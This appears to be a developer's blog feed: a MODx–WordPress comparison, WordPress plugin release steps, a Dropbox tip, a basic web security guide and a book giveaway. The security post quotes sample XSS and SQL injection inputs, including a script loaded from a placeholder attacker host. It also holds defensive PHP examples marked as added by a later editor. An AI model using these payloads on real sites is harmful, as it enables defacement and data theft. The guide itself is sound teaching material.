MODx Revolution’s manager dashboard is still being optimized. It’s based on ExtJS. For those of you not familiar with ExtJS, it was based on YUI (the Yahoo User Interface library), and it offers some fantastically powerful features for building interfaces for web applications. My only complaint with it is that it’s heavy: the MODx Revo dashboard can take a long time to load, and sometimes clicking on buttons and links feels unresponsive.

MODx Revo dashboard


Do not make your decision about which system to use based on the dashboard alone — that’s like marrying a girl for how big her tits are. I know some clients who have loved and hated the dashboards in both systems. Again, MODx offers more flexibility if you want to change the dashboard behavior. The big difference here is simple: WordPress gives you a super clean view of your posts based on time whereas MODx gives you a hierarchical view of your posts.


Everybody wants a blog, just like everybody wants a shiny new car. Authoring blogs has been a core competency of WordPress, and they get massive props for making them very simple to set up: out of the box, you can get a blog up and running with integrated tags and categories and comments within minutes. It’s really what WordPress is all about: blogging. WordPress even ships with the Akismet plugin to filter comment spam.

Contrary to some of the on-line murmurings out there, both versions of MODx can run blogs, but until MODX 2.2, the process to set them up was painfully laborious in comparison. The Articles extra for MODX gives you a quick and easy blog — it can even import your posts from WordPress, so the gap between the two systems is closing quickly. The only thing it doesn’t do as well as WordPress right out of the box is taxonomies (tags and categories): you still have to do some configuration to get those set up how you want them, but as the docs say:

“MODx Revolution is not blogging software, but rather a full-blown Content Application Platform, it doesn’t come pre-packaged with a cookie-cutter blogging solution.” 


If your priority is to get a blog up and running as quickly as possible, and you have few requirements for supporting any other content, then WordPress is the way to go. Starting with MODX 2.2, however, you can use its “Articles” extra, which gives you simple blogging functionality, with many of the features available to WordPress.

Custom Content (CMS functionality)

If blogging is where WordPress shines, then CMS functionality is where MODx clearly has the upper hand. WordPress does support custom fields for its posts and pages, and in version 3.x, they support additional “post types”, so finally WordPress is getting some traction as a CMS, but it’s still a bit of a toy in comparison to MODx.

One of the biggest problems with WordPress as a CMS is its lack of support for sensible custom fields: for each post or page, you have to manually add the same custom fields over and over again, and by default, the custom fields are always simple text fields. I have attempted to rectify this in my Custom Content Type Manager plugin, and my plugin does a lot to give WordPress CMS capabilities, but it still represents a series of awkward workarounds that stretches the WordPress core nearly to its breaking point.

One related area here is how MODx can manage and serve static files via what MODx calls “Static Resources”. This is a great way to enforce permissions on viewing, streaming, or downloading static files (e.g. PDFs or Flash movies). WordPress just flat out can’t do that.

Although MODx offers greater flexibility, WordPress’ integration is a bit cleaner for the manager user (it’s a holy pain in the ass for the developer, but if you download my plugin you should avoid this unpleasantness). When WordPress registers a new “post type”, you get a nice menu icon in your dashboard and it’s really clear to the manager that he/she is adding a new post, page, or movie (etc). For example, if you want to add a movie post, you’d click on “Add Movie”. It’s really quite logical. In MODx, this same type of distinction occurs at the template level. Architecturally, this makes sense, but it’s confusing for the manager user, because it may not be at all clear that they need to add a “normal” page (i.e. resource), and then choose to use the “movie” template. I’m planning a MODx plugin to help rectify this UI “wart”.

A custom post type in WordPress


If you have to display multiple types of content on your site (e.g. an eCommerce site), then MODx offers far greater flexibility, but it does take longer to configure. If your CMS requirements are simple and you don’t need to worry too much about customizations, then WordPress can do that very well and very quickly.


SEO is a cyclical buzzword, and at the moment, a lot of SEO guys are hailing WordPress as the holy grail of search-word wad-shooting. To be blunt, I think SEO is largely an over-hyped crock of crap. If you build a well-structured site with good content, your pages will show up in search results: if there is a site out there with awesome content that is not showing up in relevant search results, I have yet to see it. Search engine optimization is often a pseudo-science practiced by get-rich-quick marketeers who are convinced that they can turn lead into gold by over-hyping a site with various gimmicks. 90% or more of SEO should have to do with creating good content, and perhaps the last 10% of your efforts should go into polishing your site. It can be used to improve search results, but it tends to fail when you try to make search results come out of thin air. Too often I have seen companies do this the wrong way around: they spend 90% of their time publicizing a site that is a vapid cesspool instead of spending their time making a site that’s worth visiting. At best, SEO techniques are constantly changing as Google updates and refines their indexing algorithms. If you optimize your site today and Google farts tomorrow, all of your work may be for naught. Do your due diligence, but it’s just not worth spending inordinate amounts of time trying to beat Google at their own game.

Rants aside, both systems offer ample ways to do search engine optimization. Assuming that you have good content, the rest of the process boils down to having well structured HTML (which relies on a solid templating system), and the ability to effectively index your pages. WordPress offers built-in taxonomies (categories and tags) for flagging your posts, and MODx can be set up to do this rather easily by using an Auto-Tag custom field (a.k.a. a MODx “Template Variable”).

MODx offers a much more flexible system for generating URLs (basically you can use any URL you want for any page). WordPress does offer flexibility here, except for its special pages (e.g. category listings or author pages).


Comparing SEO features between MODx and WordPress is a moot point: both systems allow you to adequately structure your content and your site.


No system is 100% secure. MODx has had relatively few serious exploits; WordPress has had many, no doubt due in part to its popularity. For what it’s worth, I have had WordPress and MODx Evolution sites hacked, but not yet a Revolution site. It’s hard to quantify how secure an application is… I’d love to see the detailed forensic results of a penetration test against default installations of both CMS’s. In general though, the WordPress architecture is primitive and more ripe for being hacked: it’s more difficult to lock down spaghetti code. WordPress also offers many more plugins, and the plugin authors tend to be less experienced, so their code is more likely to have security holes.

There are many fingerprinting utilities out there that will attempt to locate known weaknesses in plugins, and WordPress is more easily fingerprinted; MODx Revo allows you to change default locations for the MODx manager or to even remove it from public view altogether. There are some discussions in the MODx Forums about how to harden MODx, but I haven’t yet seen a detailed how-to on how to eliminate the most common attack vectors. There are also good posts out there for hardening WordPress.

I reported a nasty vulnerability in phpThumb that affected MODx and numerous other CMS’s (phpThumb is a popular image manipulation library), but the MODx Revo architecture prevented the exploit from succeeding on Revo (good job to Shaun and Jason for architecting the connectors in the way they did).


I feel that MODx Revolution is probably more secure, but there are no guarantees when it comes to security. No system is bulletproof, so you best have redundant backups on hand and follow the recommendations of Basic Web Security no matter which system you’re on.


This is another area that is pretty black and white in my opinion: WordPress support sucks. Although WordPress is more popular if you look at the numbers, you wouldn’t know it if you post questions in the WordPress Forums. I have rarely gotten any useful answers (if I got answers at all): anything beyond simple inquiries tend to go unanswered, leaving me alone in the dark reverse-engineering damn near everything.

My other gripe with WordPress is the weird split between its hosted and its self-hosted flavour. You can host your blog on their service, and then you get more support, but it is effectively software as a service: you can’t upload plugins and you can’t modify code, so the experience suddenly becomes a bit like BlogSpot.

By contrast, the MODx Forums are full of helpful people. It’s a great place to be: it’s not uncommon to get responses from the core team on almost any level of inquiry, from trivial to cerebral meltdowns. There are some superstar participants, such as Susan Ottwell and Bob Ray, who have both contributed immensely helpful posts and tutorials on how to use MODx. MODx also offers commercial support; it’s still in its infancy, but for a yearly fee, you can get access to a kind of “MODx hotline” and get help resolving MODx issues on your sites.


In the same breath as support, I must mention documentation. In general, documentation for both systems is lacking, in some areas painfully so. While using WordPress, I have often searched for hours trying to find a way to do a certain thing, only to end up grepping through the code base and deciphering the raw code myself. Frequently the official documentation has holes or, in some cases, is just plain wrong. The best resources for some advanced WordPress features are blogs written by other developers.

MODx’s documentation is also frustratingly AWOL on a number of topics, but at least the MODx code base is integrated with a standard documentation publishing system, so if needed you can see for yourself how the functions are structured without having to grep through the code base. The vibrant MODx forums fill in a lot of the holes in the documentation, and that’s a huge benefit for any open-source project.


If you need support for your site, especially guaranteed support, then only MODx offers a paid support service; WordPress doesn’t offer a paid support option.


WordPress can handle a huge number of posts, but it does get bogged down with a large number of pages, and there are lots of whisperings about this (e.g. here). I suspect it has to do with WordPress’ convoluted templating system (see above), which makes me wonder what the limits are on custom post types.

MODx Evolution suffered from a limit of approximately 5000 resources (in MODx, pages and posts are types of resources), but that limit has been corrected in an upcoming release thanks largely to the efforts of Charlie over at

MODx Revolution has no such limits: it offers a great built-in caching system that allows it to serve pages very quickly. It has been benchmarked as twice as fast as Expression Engine (see this blog post).

More importantly, MODx Revolution was built with scaling in mind: it stores session data in the database, so it is easily deployed on load-balanced servers. This is hugely important if you are building a site that might one day get massive amounts of traffic; WordPress can be deployed like this, but such usage is not generally anticipated. I don’t know of many large commercial sites running WordPress (in fact, I only found one:


MODx is by far the more mature option here if you anticipate building a large site.


I do like both systems, and I use them both daily. WordPress has a much lighter footprint and is easier to use for a large number of use-cases: if you just need to get a site out the door fast, then WordPress is really hard to beat. WordPress is plug-and-play for just about everything and that saves you hours of setup time, so it can be the right solution for a majority of sites. But the more customizations you require (particularly in scripts or in layouts), then the more appealing MODx becomes: WordPress has thousands of plugins available, but if those aren’t meeting your needs, I’ve found certain types of customizations to be extremely difficult in WordPress whereas most often, MODx handles them with ease. Doing things like building web applications with strict formatting requirements is much easier in MODx because it’s built more as a launchpad for customizations: it’s really more of a content management framework (CMF). MODx Evolution is the best system I’ve used for building small to medium sized informational/brochure sites, WordPress rules as the blogging king, and I’ve been very impressed with how easily I can build web applications using MODx Revolution. There isn’t one tool that’s right for every job; the more projects you complete, the better idea you’ll have as to which system will accomplish your requirements more easily, and hopefully this article helps you spot more of what each system is good at.

Releasing New Versions of your WordPress Plugins Sat, 05 Mar 2011 08:40:22 +0000

If you are a WordPress plugin developer, then this post is for you. There is very little documentation on how to effectively use the WordPress Subversion repository, and the repo architecture is critically flawed in its structure, making “kosher” usage seem entirely buggy. Worse yet, the support in the WordPress forums is practically non-existent. For a more thorough explanation of this process, see our book on WordPress 3 Plugin Development Essentials, which features an entire chapter on dealing with SVN and the WordPress repository.

Below is the short summary of what is presented in the video.

How to release updates to your WordPress plugin (quickie version)

  1. Make the updates to your code, fix any errors, add new features.
  2. Update your plugin’s main file (the one with the information header) so that it references the new version of your plugin, e.g.
    Version: 0.5
  3. Update your readme.txt file to describe the changes you have made, but DO NOT change the Stable Tag. This number must point to an existing directory inside your repo’s tags directory.
  4. Save your files, then commit your changes to the SVN repo, e.g. svn commit . -m "My new version is ready"
  5. Tag the new version using the SVN copy command to copy the trunk new a new numbered directory in tags, e.g. svn copy
    Remember: the tagging operation is just a copy operation.
  6. By performing the tagging (i.e. copy) operation, a new directory has been created inside the tags directory. So only now can you safely update your readme.txt file’s Stable Tag, e.g.
    Stable tag: 0.5
    That number acts as a pointer to the corresponding folder inside of the tags directory (it would point to in this example).
  7. Commit your changes to the readme.txt file. This will ensure that the Stable Tag attribute points to the newly created version: svn commit . -m "Updating the stable tag"
  8. You should be done now, but the WordPress SVN repository has been so problematic…. keep an eye on your plugin’s download page and verify that the changes get picked up. The changes should be picked up within 15 minutes or so… if they don’t get picked up, look at the downloaded zip file carefully… does the link say one thing but the name of the zip file says something else? It’s easy to mix things up, so if you get stuck, try reviewing the steps here.

How to release updates to your WordPress plugin (Long Version)

Ok, that was too quick? Well, we left out some important geeky points. The way WordPress’ download page works is that it looks at the readme.txt file at the HEAD of the repo, and then it follows the value listed there for Stable tag. If the Stable tag lists version 0.8, then the information from tags/0.8/readme.txt is used to generate your plugin’s information page and the files in tags/0.8 are packaged up into a zip file and that’s what downloads when the user clicks the download link.

Can you see the problem with this setup? Normally, when you tag a directory in SVN, that copy is treated as a read-only reference, but in this setup, it is frequently easier and less prone to errors for you to go into the tags directory and make your edits. This is normally a big no-no for version control!

So the safer way to do this is to develop your plugin normally inside the wp-content/plugins directory and submit to the trunk as you normally do. Once you’re ready to publish a release, go to a new folder somewhere on your hard drive and checkout your ENTIRE project, trunk, tags, and all. Then you can do your tagging operation locally, e.g. svn copy trunk tags/0.9, and that will give you a new directory. You can update that directory’s readme.txt file and your plugin’s information header, then commit all of your code (trunk and all tags folders).

Hope that helps los dudes.

Get a Free 250 MB Upgrade by Clicking the “Get Started” Tab in Dropbox Sat, 07 Aug 2010 18:17:12 +0000

I’ve been a happy Dropbox user since the private beta was released a couple of years ago. It’s by far my favorite file storage and syncing service, and it gives me peace of mind about backups of critical files.

If you’re an old-timer like me, you may not have noticed the Get Started tab when you log into your Dropbox web account. Click it and walk through the basic usage tutorial that it presents. When you’ve finished, you may receive a free 250 MB storage upgrade. It worked for me. More storage space is always appreciated.

If you don’t have a Dropbox account yet, you can receive two gigabytes of storage for free plus an extra 250 MB by using this signup link.

Basic Web Security Mon, 10 May 2010 18:00:51 +0000

Web security is a huge topic, and this article only intends to cover some of the most basic issues and increase awareness of how carelessness or ignorance can lead to exploits. Ultimately, what you don’t know can hurt you, so it’s in your best interest to learn as much as you can about your site and the technologies it relies on. Here’s a brief run-down of some fairly common mistakes I’ve come across and what you can do to either avoid them or lessen your vulnerability.

Suspected Malware Site!
You've been F'd in the A!

Make Rolling Backups

If you do nothing else, make sure you are backing up your site and its databases. So long as you know if/when your site fails (or is hacked) and have the ability to roll back to a known good state, you have little to fear.

Make SURE you practice restoring a site from your backups! An untested backup is worthless. Nothing is worse than THINKING you have a viable backup only to discover that it is actually corrupted.

As your backup needs mature, consider storing them offsite, e.g. on Amazon’s S3 service.

I’m supplying two of my most-used backup scripts for those in need. These are fairly simple, but they will work on shared hosts. They will backup a web site’s files and its databases.

Be Diligent about Passwords

You’ve probably heard this a hundred times before, but it is really important:

  • NEVER use the same password twice! Ever!
  • Avoid short passwords! Length before strength. Try mixing up combinations of smaller units, e.g. “AlphaBetaCharlie” instead of “abc”. Be creative. You can have strong passwords that are easy to remember!
  • Store your passwords in a safe place, e.g. in a password manager like KeePass or in an encrypted disc image
  • Change your passwords periodically, and immediately after any suspected breach. Literally, put this in your calendar so you remember to do it. Rotation limits how long a leaked or cracked password stays useful; to actually stop a brute-force attack you also need rate limiting or account lockout on the login form.
  • As a secondary line of defense, you can put an .htaccess password on your manager pages. All this does is slow down a brute-force attack by forcing the attacker to crack an additional password.

Password Protecting Directories using .htaccess

This adds an additional layer of authentication to a site or to a page; it’s not meant to substitute for more robust firewall rules or active filtering, but it is easy to set up.

First, create a username and password in a file that Apache can read but that lives outside your document root (otherwise the hash file itself may be downloadable). This can be done on the bash command line using the htpasswd command. The -c flag creates the file, so leave it off when adding further users or you will wipe the existing ones; on Apache 2.4 and later, add -B to store bcrypt hashes instead of the default MD5-based ones:

htpasswd -c /path/to/htpassword/file name_of_user

Next, add the following to your .htaccess file. Be sure you reference the file you just created above:

AuthName "Protected Area"
AuthGroupFile /dev/null
AuthType Basic
AuthUserFile /path/to/htpassword/file
Require valid-user

For some more detailed information on .htaccess passwords, see this page.

Stay Patched

Make sure you’ve got an updated version of your operating system, your scripting language (PHP), your database (MySQL), and your software (WordPress, MODx, etc.). Sometimes applying patches can be scary, but it’s a lot less so if you’ve got those rolling backups in place!

I want to make mention of a very useful tool: SimpleScripts. It’s available on Bluehost accounts; it provides one-click installs of many web software packages (like WordPress and MODx) and it will alert you to update them when you log into your cPanel. It’s a real time-saver!

Clean your Room!

  • Do not install superfluous/untrusted software on your site! Don’t go dumpster diving for code that’s going to end up on a public-facing web site!
  • Shut down services you’re not using (e.g. blog posts) because it takes more time to secure them.
  • Do not store backups or sensitive data inside your document root!
  • Encrypt sensitive data
  • Check permissions.
Proper web site folder structure
Don't put backups or database dumps in your document root!

Make sure you organize your site’s files in a way that ensures that only you have access to sensitive data like backups or database dumps. These should NEVER be stored in the publicly viewable document root!

Cross Site Scripting

Behold the terror that is:

<?php print $_GET['x']; ?>

That code should NEVER be used on a public site because it effectively gives free access to the public to put whatever they want on your site! This type of code often sneaks into pagination links or into code that re-populates forms, e.g.:

<input type="text" name="myfield" value="<?php print $_POST['myfield']; ?>" />

where the ‘myfield’ variable contains something like:
" /> <script src=""></script>

For a list of values you might want to try pasting into form fields to see if they are secure, check out this great cheat sheet at

In the end, be REALLY aware of any user-submitted data. Users can put their own data into ANY form field, into any cookie and into any request header, so anything in the $_GET, $_POST, or $_COOKIE arrays (and also $_REQUEST, and the HTTP_* entries in $_SERVER such as the User-Agent and Referer) is inherently untrusted and should be carefully filtered on the way in and escaped on the way out. These are like the STDs of the web!!!

For articles about web hacks and some good real-world examples, check out other articles on
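To make the fix concrete, here is an added example (my code for this edit, not from the original post) that renders the same repopulated form field with and without escaping, plus a link built from user input. The function names e(), render_field_unsafe(), render_field_safe() and search_link() are my own, the page is assumed to be served as UTF-8, and the host in the constructed payload is a placeholder.

```php
<?php
// Added example, not code from the original post: escape user-supplied data
// before echoing it into HTML. This is the fix for the print $_GET['x']
// pattern shown above. Assumes the page is served as UTF-8.

/**
 * Escape a value for HTML body text or for a quoted attribute value.
 * ENT_QUOTES also encodes the single quote, which matters for attributes
 * written with '...' (older PHP versions leave it alone by default); the
 * explicit charset stops malformed multibyte sequences from slipping through.
 */
function e($value)
{
    return htmlspecialchars((string) $value, ENT_QUOTES, 'UTF-8');
}

/** The repopulated field exactly as the post warns against writing it. */
function render_field_unsafe($myfield)
{
    return '<input type="text" name="myfield" value="' . $myfield . '" />';
}

/** The same field with the value escaped for the attribute context. */
function render_field_safe($myfield)
{
    return '<input type="text" name="myfield" value="' . e($myfield) . '" />';
}

/** A URL built from user input needs a URL encoder, not htmlspecialchars(). */
function search_link($term)
{
    return '<a href="/search?q=' . rawurlencode($term) . '">' . e($term) . '</a>';
}

// Constructed payload in the spirit of the one above; attacker.invalid is a
// placeholder host, not a real one.
$payload = '" /><script src="http://attacker.invalid/x.js"></script><b title="';

echo render_field_unsafe($payload), "\n";
// The input element is closed early and a live <script> tag lands in the page.

echo render_field_safe($payload), "\n";
// value="&quot; /&gt;&lt;script src=&quot;http://attacker.invalid/x.js&quot;&gt;..."
// The browser decodes the entities back into plain text inside the field.

echo search_link('a&b <c>'), "\n";
// href="/search?q=a%26b%20%3Cc%3E" and link text a&amp;b &lt;c&gt;
```

The point of the three functions is that the escaping depends on where the data lands: an HTML attribute, HTML text and a URL query string each need their own encoder, and filtering on the way in (see "Filtering data" below) does not remove the need to escape on the way out.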

Don’t Take Cookies From Strangers!

If you thought cookies were somehow immune to the area of security threats, they are not! It’s easy to write your own! The Firefox Web Developer plugin lets you easily create your own cookies. This is great as a web developer, but it can also be a sneaky tool for a hacker to introduce unintended code to your application, so filter cookie contents as carefully as you would the user-submitted forms.

Cookies also carry the PHP session id: all $_SESSION data is stored on the server, but the key that ties that data to a visitor travels in the cookie. Anyone who obtains that id, by sniffing it on an unencrypted connection, stealing it via cross-site scripting, or planting it in the victim’s browser before they log in (session fixation), can make requests as that user. So, especially in applications that require a login, get a fresh id with session_regenerate_id() at the moment a user authenticates, mark the session cookie HttpOnly (and Secure on HTTPS sites), and set session.use_only_cookies so an id can’t be passed in the URL.
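Here is an added example (mine, not from the original post) of a login step that applies those session rules. The user table is constructed in memory for the demo, the function names are my own, and password_hash()/password_verify() need PHP 5.5 or newer.

```php
<?php
// Added example, not code from the original post: session handling for a
// login form. The user table is constructed in memory for the demo; in a
// real site the hashes come from your database.

// Cookie flags, set before session_start(): path '/', no explicit domain,
// Secure = false here (use true on an HTTPS-only site), HttpOnly = true so
// script running in the page (i.e. XSS) cannot read the id.
session_set_cookie_params(0, '/', '', false, true);
ini_set('session.use_only_cookies', '1');   // never accept an id from the URL
session_start();

// Constructed users; password_hash() stores a salted bcrypt hash, never the
// password itself.
$USERS = array(
    'alice' => password_hash('correct horse battery staple', PASSWORD_DEFAULT),
);

function check_credentials(array $users, $username, $password)
{
    if (!isset($users[$username])) {
        return false;
    }
    return password_verify($password, $users[$username]);
}

function login(array $users, $username, $password)
{
    if (!check_credentials($users, $username, $password)) {
        return false;
    }
    // Drop the pre-login id (true also deletes its server-side data) so an id
    // an attacker planted or sniffed earlier never becomes an authenticated one.
    session_regenerate_id(true);
    $_SESSION['user']     = $username;
    $_SESSION['login_at'] = time();
    return true;
}

function logout()
{
    $_SESSION = array();
    session_destroy();
}

var_dump(login($USERS, 'alice', 'wrong password'));               // false
var_dump(login($USERS, 'alice', 'correct horse battery staple'));  // true
```

Regenerating the id on every request is unnecessary and breaks concurrent AJAX calls; the moment that matters is the privilege change at login (and, for the same reason, at logout the whole session is destroyed rather than just the user key).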

Filtering data

Every time you submit form data, you should write your regular expressions very carefully so your application accepts ONLY clean, valid data. In general, if you can keep input as simplistic as possible, it tends to be easier to secure. Integer only inputs are “safer” than alphabetic inputs. Alphabetic input is safer than input that accepts HTML tags, and so on.

Consider the following filters:
Type-Casting to force integer only values:
$x = (int) $_GET['x'];

Alphabetical Characters Only:

// Accepts only letters a-z (case insensitive); returns the string or FALSE.
// \z rather than $ at the end: $ would also match "abc\n" (trailing newline).
function alphabetical($str)
{
    if ( preg_match('/^[a-z]+\z/i', $str) ) {
        return $str;
    }
    return FALSE;
}

For PHP coders, get familiar with the preg_match() and preg_replace() functions: they use the Perl-compatible regular expression syntax that most other languages emulate. PHP’s filter_var() also ships validators for the common cases (FILTER_VALIDATE_INT, FILTER_VALIDATE_EMAIL and friends). Have a look at strip_tags() too, but treat it as a last resort: it is no substitute for escaping output with htmlspecialchars().
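As an added example (my code, not from the original post), here is a small set of allow-list validators in the same spirit as alphabetical() above, covering the input shapes a typical site actually needs; the function names and the constructed sample inputs are my own.

```php
<?php
// Added example, not from the original post: allow-list validators. Each one
// returns the cleaned value or FALSE, like alphabetical() above; callers must
// compare with === false, because a valid integer 0 is also falsy.

function valid_int($value, $min = null, $max = null)
{
    $options = array('options' => array());
    if ($min !== null) { $options['options']['min_range'] = $min; }
    if ($max !== null) { $options['options']['max_range'] = $max; }
    // filter_var returns FALSE for "12abc", "1e3", "0x1A", "3; DROP ..." etc.;
    // a bare (int) cast would silently turn those into 12, 1, 0 and 3.
    return filter_var($value, FILTER_VALIDATE_INT, $options);
}

function valid_alpha($value, $max_len = 64)
{
    // is_string(): ?name[]=x arrives as an array, which preg_match cannot take.
    // \A and \z anchor the whole string; $ alone would accept "admin\n".
    if (is_string($value) && strlen($value) <= $max_len
        && preg_match('/\A[a-z]+\z/i', $value)) {
        return $value;
    }
    return false;
}

function valid_slug($value)
{
    // Typical URL slug: lowercase letters and digits separated by single hyphens.
    if (is_string($value) && preg_match('/\A[a-z0-9]+(?:-[a-z0-9]+)*\z/', $value)) {
        return $value;
    }
    return false;
}

function valid_choice($value, array $allowed)
{
    // Enumerated inputs (sort column, status, ...) are safest as a fixed list;
    // the strict flag stops "0" from matching an integer entry.
    return in_array($value, $allowed, true) ? $value : false;
}

function valid_email($value)
{
    return is_string($value) ? filter_var($value, FILTER_VALIDATE_EMAIL) : false;
}

// Constructed inputs as they might arrive in $_GET / $_POST.
var_dump(valid_int('3', 1, 1000));                    // int(3)
var_dump(valid_int('3; DROP TABLE users', 1));        // bool(false)
var_dump(valid_alpha("admin\n"));                     // bool(false)
var_dump(valid_slug('basic-web-security'));           // string "basic-web-security"
var_dump(valid_choice('created DESC', array('created', 'title'))); // bool(false)
var_dump(valid_email('bob@example.com'));             // string "bob@example.com"
```

Note what valid_choice() buys you: a sort column or ORDER BY direction can never be parameterised in a prepared statement, so the only safe way to accept one from the user is to map it onto a fixed list like this.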

Frame Buster

A common trick used in phishing scams or to perpetrate click fraud involves iframe-ing a site. Basically, the “trick” relies on the HTML iFrame tag to make one site display the contents of another without being obvious to the casual user.

One partial solution to this common attack vector is a little JavaScript, placed in the page’s head inside a script tag, that checks whether the page is the top-level window and breaks out of any frame it finds itself in:

<!--
if (top != self) { top.location = self.location; }
// -->

Frame busters can be defeated (the framing page can run scripts of its own), so where you control the web server also send the X-Frame-Options: SAMEORIGIN response header, which tells the browser itself to refuse framing.

Do a Google search for “frame buster javascript” to find other examples.

SQL Injection

This is a very broad topic, and there are numerous ways that SQL-injection might be used to compromise a site, but they all rely on the same principle: you construct strings of SQL statements and issue them against your database. If a malicious user is able to put his own data into one of those strings, it’s possible that a user can execute queries on your database that you never expected. This often gets back to form-validation and the ever important task of filtering user-submitted data!

Here’s a not-so-hypothetical PHP example:

$username = $_POST['username'];
$sql = "SELECT * FROM `users` WHERE `username`='$username'";

where $username contains something like:
'; INSERT INTO users (username, password) VALUES ('hacker_dude', MD5('xxxxxx') )

When that executes, two different queries are sent to the database instead of one, and if you’re not careful, it can allow an attacker to gain access to parts of your site and delete or steal data. (PHP’s classic mysql_query() refuses to run a second, stacked statement, but an attacker doesn’t need one: a username of ' OR '1'='1 turns the same SELECT into one that matches every row, which is enough to walk past a login check.)

One strong line of defense against this type of attack is using a robust database driver that allows for the use of prepared statements (available since MySQL 4.1): where you prepare a statement once, then execute it multiple times with only certain defined variables changing. What this does is it allows you to define your query and only let the user supply the variables to be used in that query. This is a much more sensible option than letting the user essentially construct the query from scratch.

More mature database driver libraries, such as PHP’s mysqli extension and PDO, support prepared statements.

You should also get familiar with escaping quotes in your database queries; this isn’t anywhere near as effective as using prepared statements, but sometimes you have to use statements that aren’t prepared, so get familiar with how to escape strings before sending them to the database. In PHP, use mysqli_real_escape_string() (or PDO::quote()), which takes the connection’s character set into account; the old mysql_real_escape_string() belongs to the deprecated mysql extension, and addslashes() is not a substitute. Escaping only protects quoted string values: an integer or a column name spliced into the query still needs validation of its own.

Finally, consider setting up special database users and roles to handle different types of queries. If a query is hijacked, it can only execute with the same permissions as the database handle. In other words, you wouldn’t grant delete or insert permissions to a database handle that was used only for selecting data. It’s more work to set up your database handles this way, but it may help prevent an attack from succeeding.
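Here is an added example (mine, not from the original post) that runs the vulnerable query from above and its prepared-statement version side by side. It uses PDO, which ships with PHP, against an in-memory SQLite table with two constructed rows so it can be tried offline; the table, rows and function names are my own, and the same PDO code works against MySQL with a mysql: DSN.

```php
<?php
// Added example, not code from the original post: the login lookup from the
// post next to its prepared-statement version, run against an in-memory
// SQLite table (constructed sample data). For MySQL, replace the DSN with
// 'mysql:host=localhost;dbname=mysite' plus a user and password.

function open_db()
{
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    // On MySQL also turn emulation off, so the server binds the values rather
    // than the driver building a string:
    //   $db->setAttribute(PDO::ATTR_EMULATE_PREPARES, false);
    $db->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, pw_hash TEXT)');
    $db->exec("INSERT INTO users (username, pw_hash) VALUES ('alice', 'hash-a')");
    $db->exec("INSERT INTO users (username, pw_hash) VALUES ('bob', 'hash-b')");
    return $db;
}

// The pattern from the post: user input spliced straight into the SQL text.
function find_user_vulnerable(PDO $db, $username)
{
    $sql = "SELECT id, username FROM users WHERE username='$username'";
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Prepared statement: the SQL is parsed first, the value is bound afterwards
// and can never change the query's structure.
function find_user(PDO $db, $username)
{
    $stmt = $db->prepare('SELECT id, username FROM users WHERE username = :u');
    $stmt->execute(array(':u' => $username));
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Fallback when the SQL must be built by hand: quote every value with the
// driver's own escaper (never addslashes()), and still validate anything that
// is not a quoted string, such as a column name or a LIMIT count.
function find_user_escaped(PDO $db, $username)
{
    $sql = 'SELECT id, username FROM users WHERE username=' . $db->quote($username);
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

$db = open_db();
$attacker = "' OR '1'='1";

// Vulnerable: WHERE username='' OR '1'='1' is true for every row.
print_r(find_user_vulnerable($db, $attacker));   // alice and bob

// Prepared and escaped: look for a user literally named ' OR '1'='1, find none.
print_r(find_user($db, $attacker));              // Array ( )
print_r(find_user_escaped($db, $attacker));      // Array ( )
```

On MySQL, pair this with the least-privilege idea above: create an account that only has SELECT on the site’s tables (GRANT SELECT ON mysite.* TO the read-only user) and use it for page rendering, keeping the INSERT/UPDATE/DELETE account for the admin side, so a hijacked query on the public site cannot modify data even if the escaping is wrong somewhere.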


Watch your cornhole. There’s a lot going on a web site, and there are a lot of ways to abuse the technologies that run them. If you understand how the exploits occur, you’ll be better prepared to prevent them.

Book Announcement – WordPress 2.9 e-Commerce (plus a giveaway) Mon, 12 Apr 2010 02:01:46 +0000

In case you’ve been wondering why my number of posts dwindled in the last year, here is the reason: I’m pleased to announce the release of my first book, WordPress 2.9 e-Commerce, published through Packt Publishing.

As the name implies, this book works through the marriage of the popular WordPress software and the WP e-Commerce plugin offered by Like most of my writings, it’s a tutorial, though on a much grander scale than a simple post. 🙂

You can read all about it on Amazon, but suffice to say that this book is aimed toward anyone who wants to sell either physical goods or digital downloads using the familiar WordPress software. It’s a comprehensive overview, but I especially spend a lot of time discussing the nitty-gritty of payment setup (both PayPal and Google Checkout) as well as the myriad of shipping options and how to handle them.

It was exciting enough to send in the final revision earlier this year, but holding the complete book in my hands is a feeling beyond words to describe. I’m proud of this book, and I hope it helps budding entrepreneurs and hobbyists alike.

Book Giveaway

And now I’d like you to hold the book in your hands! I have two copies to give away, and will gladly mail them at my expense to two readers. To enter, all you have to do is leave a comment on this post. On Monday, 19 April 2010, I will randomly select two winners and notify them. I will ship worldwide, so anyone can enter.

Good luck!
